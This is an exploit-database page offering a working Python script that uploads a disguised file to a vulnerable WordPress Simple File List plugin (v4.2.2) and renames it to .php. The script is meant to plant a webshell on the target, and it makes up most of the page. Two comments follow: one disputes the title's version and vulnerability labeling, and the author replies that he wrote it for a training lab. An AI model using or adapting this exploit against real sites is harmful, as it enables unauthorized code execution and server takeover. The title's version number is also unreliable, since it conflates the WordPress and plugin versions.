WordPress Simple File List 5.4 Shell Upload

2020.11.02
Credit: H4rk3nz0
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#!/usr/bin/python # -*- coding: utf-8 -*- # Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload # Date: 2020-11-01 # Exploit Author: H4rk3nz0 based off exploit by coiffeur # Original Exploit: https://www.exploit-db.com/exploits/48349 # Vendor Homepage: https://simplefilelist.com/ # Software Link: https://wordpress.org/plugins/simple-file-list/ # Version: Wordpress v5.4 Simple File List v4.2.2 import requests import random import hashlib import sys import os import urllib3 urllib3.disable_warnings() dir_path = '/wp-content/uploads/simple-file-list/' upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' file_name = raw_input('[*] Enter File Name (working directory): ') protocol = raw_input('[*] Enter protocol (http/https): ') http = protocol + '://' def usage(): banner =""" USAGE: python simple-file-list-upload.py <ip-address> NOTES: Append :port to IP if required. Advise the usage of a webshell as payload. Reverseshell payloads can be hit or miss. """ print (banner) def file_select(): filename = file_name.split(".")[0]+'.png' with open(file_name) as f: with open(filename, 'w+') as f1: for line in f: f1.write(line) print ('[+] File renamed to ' + filename) return filename def upload(url, filename): files = {'file': (filename, open(filename, 'rb'), 'image/png')} datas = { 'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2', } r = requests.post(url=http + url + upload_path, data=datas, files=files, verify=False) r = requests.get(url=http + url + dir_path + filename, verify=False) if r.status_code == 200: print ('[+] File uploaded at ' + http + url + dir_path + filename) os.remove(filename) else: print ('[-] Failed to upload ' + filename) exit(-1) return filename def move(url, filename): new_filename = filename.split(".")[0]+'.php' headers = {'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', 'X-Requested-With': 'XMLHttpRequest'} datas = { 'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': 'Rename|'+ new_filename, } r = requests.post(url= http + url + move_path, data=datas, headers=headers, verify=False) if r.status_code == 200: print ('[+] File moved to ' + http + url + dir_path + new_filename) else: print ('[-] Failed to move ' + filename) exit(-1) return new_filename def main(url): file_to_upload = file_select() uploaded_file = upload(url, file_to_upload) moved_file = move(url, uploaded_file) if moved_file: print ('[^-^] Exploit seems to have worked...') print ('\tURL: ' + http + url + dir_path + moved_file) if __name__ == '__main__': if len(sys.argv) < 2: usage() exit(-1) main(sys.argv[1])


See this note in RAW Version
Vote for this issue:
33%
67%

Comment it here.
Ex.Mi | Date: 2020-11-02 23:42 CET+1
Bruh, current version of this plugin is 4.2.12. Right here you specified the title as "Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload", on the Exploit-DB as "WordPress Plugin Simple File List 5.4 - Remote Code Execution". You didn't see any difference between AFU and RCE or what? WTF? Mistype or fake vuln?
H4rk3nz0 | Date: 2020-11-06 15:39 CET+1
Hi, noticed a comment and thought I should provide some clarity. The original script this is based off was beyond hit or miss and simply didn't function on a target I was exploiting in OffSecs Proving Grounds. I rewrote large portions of it so it would instead upload a specified file (intended for webshell payload) I was able to get a foothold with this script and felt it could be of use to someone else. I understand I should have maybe specified the plugin version in the title instead of the WordPress version like the original exploit. I do specify in header comments the plugin version. Apologies for any confusion. New at this. I will be more clear in future..
Copyright 2025, cxsecurity.com

 

Back to Top